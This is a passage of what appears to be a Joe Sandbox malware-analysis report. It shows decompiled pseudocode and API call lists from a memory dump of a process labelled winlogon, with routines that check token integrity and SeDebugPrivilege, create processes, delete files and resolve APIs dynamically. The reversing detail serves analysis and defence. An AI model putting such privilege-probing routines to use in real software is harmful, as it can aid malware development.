      • Part of subcall function 00D67600: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00D655C6,?), ref: 00D6762E
      • Part of subcall function 00D67600: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00D655C6,?), ref: 00D6763E
      • Part of subcall function 00D67680: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,?,?), ref: 00D676F6
      • Part of subcall function 00D67680: CreateThread.KERNEL32(00000000,00100000,Function_00007D40,?,00000000,00000000), ref: 00D67725
      • Part of subcall function 00D67680: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D67736
      • Part of subcall function 00D67680: CloseHandle.KERNEL32(?), ref: 00D67741
      • Part of subcall function 00D67680: WaitForMultipleObjects.KERNEL32(00000000,000007D0,00000001,000000FF), ref: 00D6775B
      • Part of subcall function 00D67790: CloseHandle.KERNEL32(?), ref: 00D677BF
      • Part of subcall function 00D67790: DeleteCriticalSection.KERNEL32(?,?,00D655D6,?), ref: 00D677FF
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D629D0, Relevance: 3.1, APIs: 2, Instructions: 55
    C-Code - Quality: 81%
    			E00D629D0(signed int* __ecx, void* __eflags) {
				void* _v8;
				char _v12;
				void* _t18;
				void* _t24;
				signed int* _t25;

				_t25 = __ecx;
				_push(0xdeefbad7);
				if(E00D61A30(0, __ecx) == 0) {
					L6:
					return 0;
				} else {
					_v8 = 0xffffffff;
					_t24 = GetCurrentProcess();
					_push(0xdeefbad7);
					_push( &_v8);
					if(E00D61A30(0, _t24) == 0 || OpenProcessToken(_t24, 8,  &_v8) == 0) {
						goto L6;
					} else {
						_t23 = _v8;
						if(_v8 == 0) {
							goto L6;
						} else {
							_v12 = 0;
							_t18 = E00D62A60(_t23,  &_v12); // executed
							if(_t18 == 0) {
								goto L6;
							} else {
								 *_t25 = 0 | _v12 != 0x00000000;
								return 1;
							}
						}
					}
				}
			}








    0x00d629d7
    0x00d629d9
    0x00d629eb
    0x00d62a57
    0x00d62a5d
    0x00d629ed
    0x00d629ed
    0x00d629fa
    0x00d629ff
    0x00d62a04
    0x00d62a12
    0x00000000
    0x00d62a25
    0x00d62a25
    0x00d62a2a
    0x00000000
    0x00d62a2c
    0x00d62a2f
    0x00d62a37
    0x00d62a41
    0x00000000
    0x00d62a43
    0x00d62a4b
    0x00d62a56
    0x00d62a56
    0x00d62a41
    0x00d62a2a
    0x00d62a12

    APIs
    • GetCurrentProcess.KERNEL32 ref: 00D629F4
    • OpenProcessToken.ADVAPI32(?,00000008,FFFFFFFF), ref: 00D62A1B
      • Part of subcall function 00D62A60: LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00D62ABF
      • Part of subcall function 00D62A60: GetTokenInformation.KERNELBASE(FFFFFFFF,00000003(TokenIntegrityLevel),00000000,00000000,FFFFFFFF), ref: 00D62ADB
      • Part of subcall function 00D62A60: GetTokenInformation.KERNELBASE(FFFFFFFF,00000003(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00D62B10
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D65C20, Relevance: 3.0, APIs: 2, Instructions: 47
    C-Code - Quality: 76%
    			E00D65C20(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v1032;
				signed int _t11;
				void* _t15;
				long _t17;
				signed int _t37;

				_t35 = __edi;
				_t11 =  *0xd88004; // 0x276b9783
				_v8 = _t11 ^ _t37;
				E00D6D520(__edi,  &_v1032, 0, 0x400);
				_t15 = E00D65970(__ebx,  &_v1032, _t35, __esi); // executed
				if(_t15 != 0) {
					_t17 = GetFileAttributesA( &_v1032); // executed
					if(_t17 == 0xffffffff) {
						GetFileAttributesA( &_v1032); // executed
						return E00D6ABE4(_v8 ^ _t37);
					} else {
						return E00D6ABE4(_v8 ^ _t37);
					}
				} else {
					return E00D6ABE4(_v8 ^ _t37);
				}
			}









    0x00d65c20
    0x00d65c29
    0x00d65c30
    0x00d65c41
    0x00d65c4f
    0x00d65c56
    0x00d65c6d
    0x00d65c76
    0x00d65c92
    0x00d65caf
    0x00d65c78
    0x00d65c8a
    0x00d65c8a
    0x00d65c58
    0x00d65c65
    0x00d65c65

    APIs
      • Part of subcall function 00D65970: GetVersionExW.KERNEL32(00000114), ref: 00D659AF
      • Part of subcall function 00D65970: __Stoull.NTSTC_LIBCMT ref: 00D65A16
      • Part of subcall function 00D65970: __Stoull.NTSTC_LIBCMT ref: 00D65A5B
    • GetFileAttributesA.KERNELBASE(?), ref: 00D65C6D
    • GetFileAttributesA.KERNELBASE(?), ref: 00D65C92
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D76AAA, Relevance: 3.0, APIs: 2, Instructions: 37
    C-Code - Quality: 100%
    			E00D76AAA(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E00D76A73(_t19) - _t19 >> 1) + (E00D76A73(_t19) - _t19 >> 1);
					_t6 = E00D717FF(_t14, (E00D76A73(_t19) - _t19 >> 1) + (E00D76A73(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E00D7DAE0(_t18, _t19, _t12);
					}
					E00D717C5(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}







    0x00d76aaa
    0x00d76ab4
    0x00d76ab8
    0x00d76ac9
    0x00d76acd
    0x00d76ad2
    0x00d76ad8
    0x00d76add
    0x00d76ae2
    0x00d76ae7
    0x00d76aee
    0x00d76aba
    0x00d76aba
    0x00d76aba
    0x00d76af9

    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 00D76AAE
      • Part of subcall function 00D717FF: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D61CE9,?,?,?,?,00D61B06,?,00000001), ref: 00D71831
      • Part of subcall function 00D717C5: HeapFree.KERNEL32(00000000,00000000), ref: 00D717DB
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D76AEE
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D6AA90, Relevance: 3.0, APIs: 2, Instructions: 28process
    C-Code - Quality: 100%
    			E00D6AA90(WCHAR** __ecx) {
				int _t9;
				WCHAR* _t13;
				int _t15;

				if(__ecx != 0) {
					_t13 =  *__ecx;
					if(_t13 == 0) {
						goto L1;
					} else {
						_t9 = CreateProcessW(_t13, __ecx[1], 0, 0, __ecx[0x1a], __ecx[0x1b], 0, 0,  &(__ecx[6]),  &(__ecx[2])); // executed
						_t15 = _t9;
						if(_t15 == 0) {
							GetLastError();
						}
						return _t15;
					}
				} else {
					L1:
					return 0;
				}
			}






    0x00d6aa92
    0x00d6aa97
    0x00d6aa9b
    0x00000000
    0x00d6aa9d
    0x00d6aab8
    0x00d6aabe
    0x00d6aac2
    0x00d6aac4
    0x00d6aac4
    0x00d6aacd
    0x00d6aacd
    0x00d6aa94
    0x00d6aa94
    0x00d6aa96
    0x00d6aa96

    APIs
    • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00D6AAB8
    • GetLastError.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000,00D6358E), ref: 00D6AAC4
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D72CA4, Relevance: 3.0, APIs: 2, Instructions: 17
    C-Code - Quality: 100%
    			E00D72CA4(WCHAR* _a4) {
				int _t2;

				_t2 = DeleteFileW(_a4); // executed
				if(_t2 != 0) {
					return 0;
				} else {
					return E00D720EC(GetLastError()) | 0xffffffff;
				}
			}




    0x00d72cac
    0x00d72cb4
    0x00d72ccb
    0x00d72cb6
    0x00d72cc7
    0x00d72cc7

    APIs
    • DeleteFileW.KERNELBASE(00000000,?,00D6E768,00000000,?,?,?,00D61C34,?), ref: 00D72CAC
    • GetLastError.KERNEL32(?,00D6E768,00000000,?,?,?,00D61C34,?), ref: 00D72CB6
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D67390, Relevance: 3.0, APIs: 2, Instructions: 13
    C-Code - Quality: 100%
    			E00D67390(void* __ecx) {
				int _v8;
				void* _t6;
				void* _t7;
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t12;

				_v8 = 0;
				CommandLineToArgvW(GetCommandLineW(),  &_v8); // executed
				_t6 = E00D671E0(_t7, _t9, _t10, _t11, _t12); // executed
				return _t6;
			}










    0x00d67397
    0x00d673a6
    0x00d673ac
    0x00d673b4

    APIs
    • GetCommandLineW.KERNEL32(?), ref: 00D6739F
    • CommandLineToArgvW.SHELL32(00000000), ref: 00D673A6
      • Part of subcall function 00D671E0: GetCurrentProcessId.KERNEL32(276B9783,00000000,00000000,00D7E42B,000000FF,?,invalid vector<T> subscript), ref: 00D67210
      • Part of subcall function 00D671E0: GetModuleHandleW.KERNEL32(00000000,?,000003FF), ref: 00D6731C
      • Part of subcall function 00D671E0: GetModuleFileNameW.KERNEL32(00000000), ref: 00D67323
      • Part of subcall function 00D671E0: WSACleanup.WS2_32 ref: 00D6733B
      • Part of subcall function 00D671E0: DeleteCriticalSection.KERNEL32(?), ref: 00D67354
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D6ACFE, Relevance: 1.6, APIs: 1, Instructions: 101
    C-Code - Quality: 72%
    			E00D6ACFE(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, void* __esi) {
				void* _t10;
				intOrPtr _t12;
				signed short _t17;
				void* _t20;
				void* _t27;
				void* _t29;
				void* _t31;
				char _t35;
				void* _t36;
				intOrPtr* _t40;
				void* _t44;
				void* _t50;
				intOrPtr* _t51;
				intOrPtr* _t52;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;

				_t50 = __esi;
				_t48 = __edi;
				_t47 = __edx;
				_t36 = __ecx;
				E00D6B650(__ebx, __edi, 0xd86718, 0x14);
				_t10 = E00D6B106(_t36, __edx, 1); // executed
				if(_t10 != 0) {
					L2:
					_t35 = 0;
					 *((char*)(_t55 - 0x19)) = 0;
					 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
					 *((char*)(_t55 - 0x24)) = E00D6B0D1();
					_t12 =  *0xd90ee4; // 0x2
					if(_t12 == 1) {
						goto L1;
					}
					if(_t12 != 0) {
						_t35 = 1;
						 *((char*)(_t55 - 0x19)) = 1;
						L8:
						E00D6B260( *((intOrPtr*)(_t55 - 0x24)));
						_pop(_t40);
						_t51 = E00D6B3FA();
						if( *_t51 != 0) {
							_t29 = E00D6B1D6(_t35, 0);
							_t40 = _t51;
							if(_t29 != 0) {
								_t54 =  *_t51;
								_t40 = _t54;
								L00D6B643();
								 *_t54(0, 2, 0);
							}
						}
						_t52 = E00D6B400();
						if( *_t52 != 0) {
							_t27 = E00D6B1D6(_t35, 0);
							_t40 = _t52;
							if(_t27 != 0) {
								_push( *_t52);
								E00D70E16(_t35, _t47, 0);
								_pop(_t40);
							}
						}
						_t17 = E00D6B521();
						_t20 = E00D67390(_t40, 0xd60000, 0, E00D70AF6(), _t17 & 0x0000ffff); // executed
						_t53 = _t20;
						if(E00D6B554() == 0) {
							E00D70E4E(_t53);
						}
						if(_t35 == 0) {
							E00D70DF1();
						}
						E00D6B27D(_t40, 1, 0);
						 *(_t55 - 4) = 0xfffffffe;
						L19:
						return E00D6B696();
					}
					 *0xd90ee4 = 1;
					_t31 = E00D70B98(1, _t48, _t50, 0xd7f29c, 0xd7f2b4); // executed
					_pop(_t44);
					if(_t31 == 0) {
						E00D70B3C(0, _t44, _t48, _t50, 0xd7f27c, 0xd7f298); // executed
						 *0xd90ee4 = 2;
						goto L8;
					} else {
						 *(_t55 - 4) = 0xfffffffe;
						goto L19;
					}
				}
				L1:
				E00D6B406(_t47, _t48, 7);
				goto L2;
			}




















    0x00d6acfe
    0x00d6acfe
    0x00d6acfe
    0x00d6acfe
    0x00d6ad05
    0x00d6ad0c
    0x00d6ad14
    0x00d6ad1d
    0x00d6ad1d
    0x00d6ad1f
    0x00d6ad22
    0x00d6ad2b
    0x00d6ad2e
    0x00d6ad38
    0x00000000
    0x00000000
    0x00d6ad3c
    0x00d6ad87
    0x00d6ad89
    0x00d6ad8c
    0x00d6ad8f
    0x00d6ad94
    0x00d6ad9a
    0x00d6ada0
    0x00d6ada3
    0x00d6ada8
    0x00d6adab
    0x00d6adb1
    0x00d6adb3
    0x00d6adb5
    0x00d6adba
    0x00d6adba
    0x00d6adab
    0x00d6adc1
    0x00d6adc5
    0x00d6adc8
    0x00d6adcd
    0x00d6add0
    0x00d6add2
    0x00d6add4
    0x00d6add9
    0x00d6add9
    0x00d6add0
    0x00d6adda
    0x00d6adef
    0x00d6adf4
    0x00d6adfd
    0x00d6ae00
    0x00d6ae00
    0x00d6ae07
    0x00d6ae09
    0x00d6ae09
    0x00d6ae11
    0x00d6ae18
    0x00d6ae60
    0x00d6ae65
    0x00d6ae65
    0x00d6ad3e
    0x00d6ad4e
    0x00d6ad54
    0x00d6ad57
    0x00d6ad74
    0x00d6ad7b
    0x00000000
    0x00d6ad59
    0x00d6ad59
    0x00000000
    0x00d6ad60
    0x00d6ad57
    0x00d6ad16
    0x00d6ad18
    0x00000000

    APIs
      • Part of subcall function 00D6B406: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6B413
      • Part of subcall function 00D6B406: IsDebuggerPresent.KERNEL32(?,?,?,00000017,?), ref: 00D6B4DB
      • Part of subcall function 00D6B406: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D6B4FA
      • Part of subcall function 00D6B406: UnhandledExceptionFilter.KERNEL32(?), ref: 00D6B504
    • ___scrt_get_show_window_mode.LIBCMT ref: 00D6ADDA
      • Part of subcall function 00D6B521: GetStartupInfoW.KERNEL32(?), ref: 00D6B53B
      • Part of subcall function 00D67390: GetCommandLineW.KERNEL32(?), ref: 00D6739F
      • Part of subcall function 00D67390: CommandLineToArgvW.SHELL32(00000000), ref: 00D673A6
      • Part of subcall function 00D6B554: GetModuleHandleW.KERNEL32(00000000,00D70C27,00D86AA8,0000000C,00D70E11,00000003,00000002,00000000,?,00D7188F,00000003,00D71FDD), ref: 00D6B556
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D6DEE6, Relevance: 1.6, APIs: 1, Instructions: 66library
    C-Code - Quality: 88%
    			E00D6DEE6(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t34;
				intOrPtr* _t35;

				_t20 = 0xd90f7c + _a4 * 4;
				asm("lock cmpxchg [ebx], ecx");
				_t28 =  *0xd88004; // 0x276b9783
				_t30 = _t29 | 0xffffffff;
				_t34 = _t28 ^ 0;
				asm("ror esi, cl");
				if(_t34 == _t30) {
					L14:
					return 0;
				}
				if(_t34 == 0) {
					_t35 = _a12;
					if(_t35 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t30 ^ _t28;
							goto L14;
						}
						_t34 = GetProcAddress(_t13, _a8);
						if(_t34 == 0) {
							_t28 =  *0xd88004; // 0x276b9783
							goto L13;
						}
						 *_t20 = E00D6DEC9(_t34);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E00D6DF86( *_t35); // executed
						if(_t13 != 0) {
							break;
						}
						_t35 = _t35 + 4;
						if(_t35 != _a16) {
							continue;
						}
						_t28 =  *0xd88004; // 0x276b9783
						goto L7;
					}
					_t28 =  *0xd88004; // 0x276b9783
					goto L8;
				}
				L2:
				return _t34;
			}










    0x00d6def1
    0x00d6defa
    0x00d6defe
    0x00d6df04
    0x00d6df0e
    0x00d6df10
    0x00d6df14
    0x00d6df7f
    0x00000000
    0x00d6df7f
    0x00d6df18
    0x00d6df1e
    0x00d6df24
    0x00d6df40
    0x00d6df40
    0x00d6df42
    0x00d6df44
    0x00d6df6f
    0x00d6df71
    0x00d6df79
    0x00d6df7d
    0x00000000
    0x00d6df7d
    0x00d6df50
    0x00d6df54
    0x00d6df69
    0x00000000
    0x00d6df69
    0x00d6df5d
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00d6df26
    0x00d6df26
    0x00d6df28
    0x00d6df30
    0x00000000
    0x00000000
    0x00d6df32
    0x00d6df38
    0x00000000
    0x00000000
    0x00d6df3a
    0x00000000
    0x00d6df3a
    0x00d6df61
    0x00000000
    0x00d6df61
    0x00d6df1a
    0x00000000

    APIs
    • GetProcAddress.KERNEL32(00000000,?,00D90F50,00000000,?,?,00D6E10C,00000008,InitializeCriticalSectionEx,00D7F6B4,InitializeCriticalSectionEx,00000000,?,00D6DE74,00D90F50,00000FA0), ref: 00D6DF4A
      • Part of subcall function 00D6DF86: LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00D90F50,?,?,00D6DF2D,?,00D90F50,00000000,?,?,00D6E10C,00000008,InitializeCriticalSectionEx), ref: 00D6DFBE
      • Part of subcall function 00D6DF86: GetLastError.KERNEL32(?,?,00D6DF2D,?,00D90F50,00000000,?,?,00D6E10C,00000008,InitializeCriticalSectionEx,00D7F6B4,InitializeCriticalSectionEx,00000000,?,00D6DE74), ref: 00D6DFCA
      • Part of subcall function 00D6DF86: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,?,00D6DF2D,?,00D90F50,00000000,?,?,00D6E10C,00000008,InitializeCriticalSectionEx,00D7F6B4,InitializeCriticalSectionEx), ref: 00D6DFD8
      • Part of subcall function 00D6DF86: FreeLibrary.KERNEL32(00000000,?,?,00D6DF2D,?,00D90F50,00000000,?,?,00D6E10C,00000008,InitializeCriticalSectionEx,00D7F6B4,InitializeCriticalSectionEx,00000000), ref: 00D6DFFA
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D62920, Relevance: 1.6, APIs: 1, Instructions: 66
    C-Code - Quality: 80%
    			E00D62920(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				char _v12;
				void* __edi;
				void* __esi;
				void* _t15;
				intOrPtr _t23;
				void* _t27;
				void* _t28;
				void* _t29;

				_push(0xdeefbad7);
				_t27 = __edx;
				_t28 = __ecx;
				_push(__edx);
				if(E00D61A30(0, __ecx) == 0) {
					L10:
					__eflags = 0;
					return 0;
				} else {
					_push(0xdeefbad7);
					_v8 = 0xffffffff;
					_push( &_v8);
					if(E00D61A30(0, _t28) == 0 || OpenProcessToken(_t28, 8,  &_v8) == 0) {
						goto L10;
					} else {
						_t21 = _v8;
						if(_v8 == 0) {
							goto L10;
						} else {
							_v12 = 0;
							_t15 = E00D62820(_t21,  &_v12); // executed
							_t39 = _t15;
							if(_t15 == 0) {
								goto L10;
							} else {
								_t29 = E00D626C0(__ebx, _v12, _t27, _t27, _t28, _t39);
								_t23 = _v12;
								if(_t23 != 0 && _t23 != 0xffffffff && _t23 != 0xcccccccc) {
									E00D7009A(_t23);
								}
								return _t29;
							}
						}
					}
				}
			}












    0x00d62928
    0x00d6292d
    0x00d6292f
    0x00d62931
    0x00d6293f
    0x00d629bd
    0x00d629bd
    0x00d629c3
    0x00d62941
    0x00d62941
    0x00d62949
    0x00d62950
    0x00d6295e
    0x00000000
    0x00d62971
    0x00d62971
    0x00d62976
    0x00000000
    0x00d62978
    0x00d6297b
    0x00d62982
    0x00d62987
    0x00d62989
    0x00000000
    0x00d6298b
    0x00d62995
    0x00d62997
    0x00d6299c
    0x00d629ac
    0x00d629b1
    0x00d629bb
    0x00d629bb
    0x00d62989
    0x00d62976
    0x00d6295e

    APIs
    • OpenProcessToken.ADVAPI32(?,00000008,FFFFFFFF), ref: 00D62967
      • Part of subcall function 00D62820: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 00D62873
      • Part of subcall function 00D62820: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?), ref: 00D628A6
      • Part of subcall function 00D62820: IsValidSid.ADVAPI32(00000000,?,TokenIntegrityLevel,00000000,00000000,00000000,?), ref: 00D628B2
      • Part of subcall function 00D62820: GetLengthSid.ADVAPI32(00000000,?,TokenIntegrityLevel,00000000,00000000,00000000,?), ref: 00D628BE
      • Part of subcall function 00D62820: CopySid.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 00D628DD
      • Part of subcall function 00D626C0: IsValidSid.ADVAPI32 ref: 00D626F3
      • Part of subcall function 00D626C0: ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00D62713
      • Part of subcall function 00D626C0: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 00D627A3
      • Part of subcall function 00D626C0: LocalFree.KERNEL32(00000000,?,?,?), ref: 00D627FD
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D74C37, Relevance: 1.6, APIs: 1, Instructions: 65library
    C-Code - Quality: 90%
    			E00D74C37(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0xd914b8 + _a4 * 4;
				_t27 =  *0xd88004; // 0x276b9783
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0xd88004; // 0x276b9783
							goto L13;
						}
						 *_t20 = E00D6DEC9(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E00D74CD3( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0xd88004; // 0x276b9783
						goto L7;
					}
					_t27 =  *0xd88004; // 0x276b9783
					goto L8;
				}
				L2:
				return _t33;
			}










    0x00d74c42
    0x00d74c4b
    0x00d74c51
    0x00d74c5b
    0x00d74c5d
    0x00d74c61
    0x00d74ccc
    0x00000000
    0x00d74ccc
    0x00d74c65
    0x00d74c6b
    0x00d74c71
    0x00d74c8d
    0x00d74c8d
    0x00d74c8f
    0x00d74c91
    0x00d74cbc
    0x00d74cbe
    0x00d74cc6
    0x00d74cca
    0x00000000
    0x00d74cca
    0x00d74c9d
    0x00d74ca1
    0x00d74cb6
    0x00000000
    0x00d74cb6
    0x00d74caa
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00d74c73
    0x00d74c73
    0x00d74c75
    0x00d74c7d
    0x00000000
    0x00000000
    0x00d74c7f
    0x00d74c85
    0x00000000
    0x00000000
    0x00d74c87
    0x00000000
    0x00d74c87
    0x00d74cae
    0x00000000
    0x00d74cae
    0x00d74c67
    0x00000000

    APIs
    • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00D74EC5,00000006,FlsSetValue,00D80B4C,00D80B54,00000000,00000364,?,00D7202C,00000000), ref: 00D74C97
      • Part of subcall function 00D74CD3: LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,00D74C7A,?,00000000,00000000,00000000,?,00D74EC5,00000006,FlsSetValue), ref: 00D74D05
      • Part of subcall function 00D74CD3: GetLastError.KERNEL32(?,00D74C7A,?,00000000,00000000,00000000,?,00D74EC5,00000006,FlsSetValue,00D80B4C,00D80B54,00000000,00000364,?,00D7202C), ref: 00D74D11
